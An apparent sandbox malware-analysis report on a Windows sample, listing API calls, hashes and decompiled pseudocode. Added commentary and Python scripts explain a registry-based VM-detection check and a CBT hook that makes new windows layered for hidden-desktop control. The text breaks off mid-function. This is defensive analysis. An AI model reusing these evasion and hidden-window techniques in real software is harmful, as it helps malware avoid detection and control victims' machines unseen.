                                          • Instruction ID: 3f89336fc9bfaa37975bc66d70456ebc1c4db469d68ffcdc487f1ee77b4b5bd6
                                          • Opcode Fuzzy Hash: 87d0e0c747dcab134f6c8fc9f1c45709c33c6a08fcfbd272cadd49876fb8f899
                                          • Instruction Fuzzy Hash: 67F04FA2A0AE8482FF959F61D8547782360EF84F49F4883348E1F0A554CF3D50898765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowRect.USER32 ref: 00C832E3
                                            • Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65
                                          • MoveWindow.USER32 ref: 00C83390
                                          • RedrawWindow.USER32 ref: 00C833A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Rect$MoveRedraw
                                          • String ID: gfff
                                          • API String ID: 3281031154-1553575800
                                          • Opcode ID: a1faa506de5f69b457bbd84acf5d60bcfff25791962edc4cbd8d13d8fe757d76
                                          • Instruction ID: e1983b3bd2bfe0297270212e07911212693b95c10f629d285303dcec47ae402f
                                          • Opcode Fuzzy Hash: a1faa506de5f69b457bbd84acf5d60bcfff25791962edc4cbd8d13d8fe757d76
                                          • Instruction Fuzzy Hash: 2721837222859187D728CF2AF444B1E7B61F3C4B94F549214FA6A87F64CF38DA058B04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(00000000,00C620AD), ref: 00C621F8
                                          • RegQueryValueExW.ADVAPI32 ref: 00C62239
                                          • RegCloseKey.ADVAPI32 ref: 00C62257
                                          Strings
                                          • SYSTEM\CurrentControlSet\services\Disk\Enum, xrefs: 00C621E5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: SYSTEM\CurrentControlSet\services\Disk\Enum
                                          • API String ID: 3677997916-1303479782
                                          • Opcode ID: 004432ba3de67efd4db382fd00b1024806ca88830e7239a14b5ea6bc1173265f
                                          • Instruction ID: 1b75e3b21278fc59474f7d01a0b56b5ff5c16636d465733cfd0095f874fc8962
                                          • Opcode Fuzzy Hash: 004432ba3de67efd4db382fd00b1024806ca88830e7239a14b5ea6bc1173265f
                                          • Instruction Fuzzy Hash: A701EDB2215B8086E7309B54F898B9A7365F784794F8092259B8D43F6AEF3CC14CCB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%
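The function above opens SYSTEM\CurrentControlSet\services\Disk\Enum and reads a single value from it. That key holds the Plug and Play hardware IDs of the attached disks, and those IDs embed the vendor and product strings that virtual disks carry (VBOX, VMware, QEMU, Virtual), so querying it is a common way for a sample to decide whether it is running inside a VM before it does anything interesting. The report does not show what this function does with the value, so treat VM detection as the likely purpose rather than a confirmed one. The following script is an added example, not code from the report or from the sample: it reads the key the way such a sample would and flags disk IDs that give a hypervisor away, which is a quick check of whether an analysis host leaks through this key. The marker list and the embedded sample values are constructed for illustration; on Windows the live key is read through winreg, elsewhere the constructed sample is used.

```python
"""Self-check for an analysis VM: is a hypervisor visible through
HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum?

Added example, not part of the Joe Sandbox report. The marker table and
SAMPLE_VALUES are assumptions constructed for illustration.
"""
import sys

# Substrings that commonly appear in the disk hardware IDs of virtual machines.
# Assumption: illustrative, not exhaustive.
VM_MARKERS = {
    "VBOX": "VirtualBox",
    "VMWARE": "VMware",
    "VIRTUAL": "generic virtual disk (VMware, Hyper-V, ...)",
    "QEMU": "QEMU/KVM",
    "XEN": "Xen",
}


def enumerate_disk_ids(values):
    """Return the disk IDs from a Disk\\Enum value dict in index order.

    `values` mirrors what RegQueryValueExW returns per value name: 'Count'
    and 'NextInstance' are DWORDs, the numbered names ('0', '1', ...) are
    REG_SZ hardware IDs.
    """
    numbered = [(int(name), data) for name, data in values.items() if name.isdigit()]
    return [data for _, data in sorted(numbered)]


def find_vm_markers(disk_ids):
    """Map each disk ID to the hypervisor markers it exposes (case-insensitive)."""
    hits = {}
    for disk_id in disk_ids:
        upper = disk_id.upper()
        found = [vendor for marker, vendor in VM_MARKERS.items() if marker in upper]
        if found:
            hits[disk_id] = found
    return hits


def read_disk_enum_from_registry():
    """Read the live key on Windows; return None elsewhere or if the key is missing."""
    try:
        import winreg
    except ImportError:
        return None
    path = r"SYSTEM\CurrentControlSet\Services\Disk\Enum"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            values = {}
            index = 0
            while True:
                try:
                    name, data, _type = winreg.EnumValue(key, index)
                except OSError:
                    break
                values[name] = data
                index += 1
            return values
    except OSError:
        return None


# Constructed sample resembling a VirtualBox guest with one virtual and one
# passed-through disk. Not taken from the analysed sample.
SAMPLE_VALUES = {
    "Count": 2,
    "NextInstance": 2,
    "0": r"SCSI\Disk&Ven_VBOX&Prod_HARDDISK\4&1abf8a7&0&000000",
    "1": r"SCSI\Disk&Ven_SAMSUNG&Prod_SSD_860_EVO\4&2f1a77c&0&010000",
}

if __name__ == "__main__":
    values = read_disk_enum_from_registry() or SAMPLE_VALUES
    hits = find_vm_markers(enumerate_disk_ids(values))
    for disk_id, vendors in hits.items():
        print(f"{disk_id}: {', '.join(vendors)}")
    # Non-zero exit means the host is recognisable as a VM through this key.
    sys.exit(1 if hits else 0)
```

If the script exits non-zero on your sandbox, a sample performing this check will see the same strings; the usual mitigation is to present disks whose hardware IDs look like physical vendors, which is a hypervisor configuration change rather than something the guest can hide.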

                                          APIs
                                            • Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4
                                          • GetWindowInfo.USER32 ref: 00C69881
                                          • SetWindowLongPtrA.USER32 ref: 00C698AC
                                          • SetLayeredWindowAttributes.USER32 ref: 00C698C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$AttributesInfoLayeredLongParent
                                          • String ID: <
                                          • API String ID: 1120277486-4251816714
                                          • Opcode ID: f0f8b66c568201314e22f365d3e712022d769a10de16235915620f5c3a508217
                                          • Instruction ID: 7a37914a1ce3f383d250b7a28f149fc49dbbfa8299d4fb7b5d3f7f3d2636fa25
                                          • Opcode Fuzzy Hash: f0f8b66c568201314e22f365d3e712022d769a10de16235915620f5c3a508217
                                          • Instruction Fuzzy Hash: 87F05E71700741C3EB305F15B405B696720EB9AB88F548164EE960BB99DF3DCA598B08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL(?,?,?,?,?,?,?,00000000,00C814C0), ref: 00C7BD7C
                                          • GetWindowThreadProcessId.USER32 ref: 00C7BD8E
                                          • GetGUIThreadInfo.USER32 ref: 00C7BD9B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$InfoProcessWindowmemset
                                          • String ID: H
                                          • API String ID: 2955632527-2852464175
                                          • Opcode ID: 98bdd6957d2efa4d54d0e85e50882750046535e2c8441cb97e53c30274259f7f
                                          • Instruction ID: e942affab521cd2fb22299a0a971e8a875f963623e4a81d3fb47379352266957
                                          • Opcode Fuzzy Hash: 98bdd6957d2efa4d54d0e85e50882750046535e2c8441cb97e53c30274259f7f
                                          • Instruction Fuzzy Hash: 0FE0866271094482EB21DB27E84575D7361FBC8B45F948221D65E03A68DF3CC95DCB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32(?,?,?,?,00C68866,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68B43
                                          • GetProcAddress.KERNEL32(?,?,?,?,00C68866,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68B53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: NTDLL.DLL$RtlSetUnhandledExceptionFilter
                                          • API String ID: 1646373207-97048080
                                          • Opcode ID: 91ed791288103449da59674b4fcb09106c5e0380a861d7140b14df7f28e1b4b7
                                          • Instruction ID: 54b707fdc86cca12175037f6e7fb87ad6ef90b3978800d3a71a9a4f6f09c6980
                                          • Opcode Fuzzy Hash: 91ed791288103449da59674b4fcb09106c5e0380a861d7140b14df7f28e1b4b7
                                          • Instruction Fuzzy Hash: 69E04264622A00D1FA459B51FCA5B993360BB94B41FD8932AC40E42770EF3CC65ED704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A22A
                                          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A2BE
                                          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A2D6
                                          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A2EE
                                          • HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A306
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$lstrcmpi
                                          • String ID:
                                          • API String ID: 3326462632-0
                                          • Opcode ID: 8af70c186274995e2d309205c32f7d9d4e1aee669db6f0a3fd9f7c54be15a4a0
                                          • Instruction ID: eef09129009c3d9cf19ab2992c63c80f8bc2acbbb70b0104b4f4ef9543728885
                                          • Opcode Fuzzy Hash: 8af70c186274995e2d309205c32f7d9d4e1aee669db6f0a3fd9f7c54be15a4a0
                                          • Instruction Fuzzy Hash: B0416F26600B8085EB29DF6298407AE33B5F7C4F88F49C516DE6C53B1ADF39CA95C345
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E00C69E84(void* __ecx, signed int __rax, long long __rbx, void* __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, long long _a8) {
                                          				char _v15;
                                          				short _v17;
                                          				char _v21;
                                          				char _v22;
                                          				char _v24;
                                          				void* __rdi;
                                          				long _t21;
                                          				char _t23;
                                          				signed char _t26;
                                          				signed int _t28;
                                          				signed int _t29;
                                          				void* _t37;
                                          				signed int _t48;
                                          				intOrPtr _t52;
                                          				intOrPtr _t53;
                                          				intOrPtr _t54;
                                          				void* _t70;
                                          
                                          				_t64 = __rbp;
                                          				_t63 = __rsi;
                                          				_t43 = __rax;
                                          				_a8 = __rbx;
                                          				_t62 = __rdx;
                                          				if( *0xc95760 == 0) {
                                          					L11:
                                          					__eflags = 0;
                                          					_t21 = CallNextHookEx(??, ??, ??, ??);
                                          					L12:
                                          					return _t21;
                                          				}
                                          				_t37 = __ecx - 3;
                                          				if(_t37 == 0) {
                                          					_v24 =  *"/0" & 0x0000ffff;
                                          					_t23 =  *0xc89b9e; // 0x0
                                          					_v22 = _t23;
                                          					_v21 = 0;
                                          					_v17 = 0;
                                          					_v15 = 0;
                                          					_t8 = _t43 + 0xa; // 0xa
                                          					r8d = _t8;
                                          					GetClassNameA(??, ??, ??);
                                          					_t26 = E00C7BCD8(__r8,  &_v24, __rdx, __rsi, __rbp);
                                          					__eflags = _t26 & 0x00000040;
                                          					if((_t26 & 0x00000040) != 0) {
                                          						_t54 =  *__r8;
                                          						__eflags =  *(_t54 + 0x30) & 0x80cf0000;
                                          						if(( *(_t54 + 0x30) & 0x80cf0000) != 0) {
                                          							_t28 =  *(_t54 + 0x48);
                                          							r8d = 0x80000;
                                          							__eflags = r8d & _t28;
                                          							if((r8d & _t28) == 0) {
                                          								_t29 = _t28 | r8d;
                                          								__eflags = _t29;
                                          								 *(_t54 + 0x48) = _t29;
                                          							}
                                          						}
                                          					}
                                          					_t70 = _t62;
                                          					_t21 = CallNextHookEx(??, ??, ??, ??);
                                          					_t48 = _t43;
                                          					__eflags = _t43;
                                          					if(__eflags == 0) {
                                          						_t52 =  *0xc95760; // 0x0
                                          						E00C69814(3, __eflags, _t43, _t52, _t62, _t70);
                                          						_t53 =  *0xc95760; // 0x0
                                          						_t21 = E00C69C40(_t43, _t48, _t53, _t62, _t63, _t64,  &_v24);
                                          					}
                                          					L10:
                                          					goto L12;
                                          				}
                                          				if(_t37 != 1) {
                                          					goto L11;
                                          				} else {
                                          					CallNextHookEx();
                                          					r8d = 1;
                                          					_t48 = __rax;
                                          					_t21 = E00C69DC0(4, __rax, __rdx, __rsi, __rbp);
                                          					goto L10;
                                          				}
                                          			}

                                          APIs
                                          • CallNextHookEx.USER32 ref: 00C69EBF
                                            • Part of subcall function 00C69DC0: EnterCriticalSection.KERNEL32 ref: 00C69DE5
                                            • Part of subcall function 00C69DC0: LeaveCriticalSection.KERNEL32 ref: 00C69E2A
                                            • Part of subcall function 00C69DC0: SetWindowLongPtrA.USER32 ref: 00C69E4D
                                            • Part of subcall function 00C69DC0: HeapFree.KERNEL32 ref: 00C69E66
                                          • GetClassNameA.USER32 ref: 00C69F13
                                          • CallNextHookEx.USER32 ref: 00C69F62
                                          • CallNextHookEx.USER32 ref: 00C69FA2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CallHookNext$CriticalSection$ClassEnterFreeHeapLeaveLongNameWindow
                                          • String ID:
                                          • API String ID: 2202591129-0
                                          • Opcode ID: 4412b6e1efded87cf6ec26bccfae5f80ed80dcb5d8e7173f139ce0214f4e5171
                                          • Instruction ID: e1215e000294a238f42460941afcf45a1dd463ae8ee54e144fe029295da8155e
                                          • Opcode Fuzzy Hash: 4412b6e1efded87cf6ec26bccfae5f80ed80dcb5d8e7173f139ce0214f4e5171
                                          • Instruction Fuzzy Hash: D131262131464085EF30CFA6E58476AA765FB89BC8F58812AEE4CC7B98DF3CC605C705
                                          Uniqueness

                                          Uniqueness Score: -1.00%
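Reading the decompiled callback E00C69E84: a CBT hook procedure receives the hook code in ecx, the new window handle in rdx and lParam in r8, and hook codes 3 and 4 are HCBT_CREATEWND and HCBT_DESTROYWND. In the HCBT_CREATEWND branch the code dereferences lParam once (CBT_CREATEWND.lpcs, the CREATESTRUCT) and then tests offset 0x30 against 0x80CF0000 and ORs 0x80000 into offset 0x48; on x64 those offsets are CREATESTRUCT.style and CREATESTRUCT.dwExStyle, 0x80CF0000 is WS_POPUP plus the WS_OVERLAPPEDWINDOW frame bits, and 0x80000 is WS_EX_LAYERED. So, after a class-name check through E00C7BCD8 that the report does not resolve, the hook forces WS_EX_LAYERED onto every top-level window as it is created, which is the precondition for the SetLayeredWindowAttributes call seen at 00C698C3 in this dump to make those windows transparent. The mapping of offsets to CREATESTRUCT fields is my reading of the code, not something the report states. The following Python is an added example, not part of the report or the sample: it decodes the two masks into their winuser.h names and reproduces the branch so the condition can be checked against other style values.

```python
"""Decode the constants used by the CBT hook callback E00C69E84 and reproduce
its decision logic.

Added example, not part of the Joe Sandbox report. Flag values are the Win32
constants from winuser.h; the offset-to-field mapping noted in the comments is
an assumption from reading the decompiled code.
"""

# Win32 window style bits (winuser.h), high bit first.
WS_STYLES = {
    0x80000000: "WS_POPUP",
    0x40000000: "WS_CHILD",
    0x20000000: "WS_MINIMIZE",
    0x10000000: "WS_VISIBLE",
    0x08000000: "WS_DISABLED",
    0x04000000: "WS_CLIPSIBLINGS",
    0x02000000: "WS_CLIPCHILDREN",
    0x01000000: "WS_MAXIMIZE",
    0x00800000: "WS_BORDER",
    0x00400000: "WS_DLGFRAME",
    0x00200000: "WS_VSCROLL",
    0x00100000: "WS_HSCROLL",
    0x00080000: "WS_SYSMENU",
    0x00040000: "WS_THICKFRAME",
    0x00020000: "WS_MINIMIZEBOX",
    0x00010000: "WS_MAXIMIZEBOX",
}

WS_EX_LAYERED = 0x00080000
HCBT_CREATEWND = 3
HCBT_DESTROYWND = 4

# Constants lifted from the decompiled callback above.
HOOK_STYLE_MASK = 0x80CF0000   # compared with *(lpcs + 0x30): CREATESTRUCT.style on x64 (assumption)
HOOK_EXSTYLE_BIT = 0x00080000  # OR-ed into *(lpcs + 0x48): CREATESTRUCT.dwExStyle on x64 (assumption)


def decode_flags(value, table):
    """Split a bitmask into the names in `table` (highest bit first) plus any
    leftover bits the table does not know about."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    known = sum(bit for bit in table if value & bit)
    return names, value & ~known & 0xFFFFFFFF


def hook_new_exstyle(ncode, style, exstyle):
    """Reproduce the hook's decision for one window creation.

    For HCBT_CREATEWND, any window whose style carries a top-level frame bit
    gets WS_EX_LAYERED added to its extended style; every other hook code is
    passed through unchanged. The extra class-name gate via E00C7BCD8 in the
    real code is not known from the report and is omitted here.
    Returns the dwExStyle the window will be created with.
    """
    if ncode != HCBT_CREATEWND:
        return exstyle
    if style & HOOK_STYLE_MASK and not exstyle & HOOK_EXSTYLE_BIT:
        return exstyle | HOOK_EXSTYLE_BIT
    return exstyle


if __name__ == "__main__":
    names, leftover = decode_flags(HOOK_STYLE_MASK, WS_STYLES)
    print(f"0x{HOOK_STYLE_MASK:08X} = {' | '.join(names)}"
          + (f" | 0x{leftover:08X}" if leftover else ""))
    print(f"0x{HOOK_EXSTYLE_BIT:08X} is WS_EX_LAYERED: {HOOK_EXSTYLE_BIT == WS_EX_LAYERED}")
    # A plain overlapped window: the hook adds WS_EX_LAYERED.
    print(hex(hook_new_exstyle(HCBT_CREATEWND, 0x00CF0000, 0)))
    # A child control: no frame bits, left alone.
    print(hex(hook_new_exstyle(HCBT_CREATEWND, 0x40000000, 0)))
```

The practical point for detection: a process that installs a WH_CBT hook and whose newly created top-level windows all come back with WS_EX_LAYERED set, followed by SetLayeredWindowAttributes with zero alpha, is behaving like a hidden-desktop remote-control module rather than a normal GUI application.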

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID:
                                          • API String ID: 1586453840-0
                                          • Opcode ID: d74e9bd5505a694184b659cb81c579426c136a820e312998712310e51cb33151
                                          • Instruction ID: 4ffdc9a675480dd8b365a1676b9df645e8f5b54cf6237255f320c5646e8d3db1
                                          • Opcode Fuzzy Hash: d74e9bd5505a694184b659cb81c579426c136a820e312998712310e51cb33151
                                          • Instruction Fuzzy Hash: 2F318736B10B508AEB10DFA6D484BAD73B4FB48B88F044565EE5D57B08DF39CA49CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • HeapAlloc.KERNEL32(?,?,?,?,?,?,00000000,00C77EAD,?,?,?,?,00000000,00C78917), ref: 00C77F76
                                          • wsprintfA.USER32 ref: 00C78046
                                          Strings
                                          • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 00C7802B
                                          • %08X-%04X-%04X-%04X-%08X%04X, xrefs: 00C78039
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocHeapwsprintf
                                          • String ID: %08X-%04X-%04X-%04X-%08X%04X${%08X-%04X-%04X-%04X-%08X%04X}
                                          • API String ID: 578682255-2243025055
                                          • Opcode ID: 1b2162af997491215a2ebdc3f0990350f031a022d24ddcb22048b07a24d00492
                                          • Instruction ID: 18fb3abc6f3230bd95104bc55185222388e1cd57f5552750fc481470536b09b4
                                          • Opcode Fuzzy Hash: 1b2162af997491215a2ebdc3f0990350f031a022d24ddcb22048b07a24d00492
                                          • Instruction Fuzzy Hash: CA21E9E26182E047E73A4B25B84072ABFE1E345782F048025FBEA82F55EA3CD514DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowRect.USER32 ref: 00C831EE
                                          • GetWindowRect.USER32 ref: 00C831FB
                                          • GetWindowRect.USER32 ref: 00C83208
                                            • Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65
                                          • MoveWindow.USER32 ref: 00C8329E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Rect$Move
                                          • String ID:
                                          • API String ID: 460932116-0
                                          • Opcode ID: 1dbe4346d1e10b901c4433f86c8ca2dcf208ee7a7aa7a61ada99c80b82bd98c2
                                          • Instruction ID: c1a5ab84e3301957d501cbb5d3f63ea188acf6cafe40bfae40315022b58097a3
                                          • Opcode Fuzzy Hash: 1dbe4346d1e10b901c4433f86c8ca2dcf208ee7a7aa7a61ada99c80b82bd98c2
                                          • Instruction Fuzzy Hash: E9314B36B20650CEE710CF69E844BAD7771F348B88F648514DE1963B18CF39DA46CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E00C62714(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                          				void* _v8;
                                          				long long _v24;
                                          				long long _v32;
                                          				long long _v40;
                                          				long long _v56;
                                          				char _v72;
                                          				void* __rdi;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t38;
                                          				intOrPtr _t46;
                                          				char* _t47;
                                          				long long _t49;
                                          				long long _t64;
                                          				void* _t66;
                                          				void* _t77;
                                          
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t46 =  *((intOrPtr*)(__rdx + 0x3c));
                                          				_t66 = __rcx;
                                          				_t34 = 1;
                                          				if( *((intOrPtr*)(__r9 + 0x20)) <= __rcx) {
                                          					L11:
                                          					return _t34;
                                          				}
                                          				_t47 = _t46 + __rcx;
                                          				if( *((intOrPtr*)(__r9 + 0x20)) >= _t47) {
                                          					goto L11;
                                          				}
                                          				if(r8d == 0) {
                                          					_t34 = 0x1778;
                                          					goto L11;
                                          				}
                                          				lstrlenA();
                                          				E00C61E70();
                                          				_t64 = _t47;
                                          				if(_t47 == 0) {
                                          					_t34 = 8;
                                          					goto L11;
                                          				}
                                          				lstrcpyA();
                                          				__imp__StrChrA();
                                          				if(_t47 != 0) {
                                          					 *_t47 = 0;
                                          					_v72 = _t64;
                                          					_v56 = _t47 + 1;
                                          					_t49 =  *((intOrPtr*)(__rcx + 0x20));
                                          					_v40 = _t49;
                                          					GetModuleHandleA(??);
                                          					if(_t49 != 0) {
                                          						r8d = 0;
                                          						_t33 = E00C62DA4(_t38, __rbx,  &_v72, _t49, _t64, __rcx, __r9, __r9, _t77);
                                          						_t34 = _t33;
                                          						if(_t33 == 0) {
                                          							 *((long long*)(_t66 + 0x28)) = _v32;
                                          							 *((long long*)(_t66 + 0x30)) = _v24;
                                          						}
                                          					}
                                          				}
                                          				E00C61E84();
                                          				goto L11;
                                          			}

                                          APIs
                                          • lstrlenA.KERNEL32 ref: 00C62769
                                          • lstrcpyA.KERNEL32 ref: 00C62786
                                          • StrChrA.SHLWAPI ref: 00C62792
                                          • GetModuleHandleA.KERNEL32 ref: 00C627B9
                                            • Part of subcall function 00C62DA4: VirtualProtect.KERNEL32 ref: 00C62E0F
                                            • Part of subcall function 00C62DA4: VirtualProtect.KERNEL32 ref: 00C62EE4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$HandleModulelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 763936189-0
                                          • Opcode ID: 281345c29ad92fabc9d1fc1fae91e742f8b7f8f999115a527bb6e79660b46c83
                                          • Instruction ID: cfbd847ff45cd2d05835cdaccb3e38bc741c355f9eaad3968acdc85f6f82a2a8
                                          • Opcode Fuzzy Hash: 281345c29ad92fabc9d1fc1fae91e742f8b7f8f999115a527bb6e79660b46c83
                                          • Instruction Fuzzy Hash: CF214636208B8082EB20DB12E884B69B3A0F78CB80F588625EE9E47B44DF38D855C710
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 26%
                                          			// Opens a file and reads a 4-byte value from it. E00C64588 wraps GetModuleFileNameA (see APIs below),
                                          			// so the path is most likely the module's own image; E00C64458 supplies the offset that the
                                          			// SetFilePointer result is checked against. The CreateFileA setup visible on the stack is
                                          			// OPEN_EXISTING (_v72 = 3), FILE_ATTRIBUTE_NORMAL (_v64 = 0x80) and FILE_SHARE_READ (r8d = 1);
                                          			// the value is only used when ReadFile succeeded and _a24 (apparently the byte count) is 4.
                                          			E00C64B0C(void* __edi, void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8, intOrPtr _a24, void* _a32) {
                                          				char _v40;
                                          				long long _v56;
                                          				intOrPtr _v64;
                                          				long long _v72;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				int _t16;
                                          				void* _t25;
                                          				int _t27;
                                          				long long _t38;
                                          				void* _t52;
                                          				void* _t53;
                                          				void* _t55;
                                          
                                          				_t38 = __rbx;
                                          				_t25 = __edi;
                                          				_a8 = __rbx;
                                          				_t53 = __rdx;
                                          				_t52 = __rcx;
                                          				_t16 = E00C64588(__rax, __rbx, __rcx,  &_v40, __rdx, _t55);
                                          				_t28 = _t16;
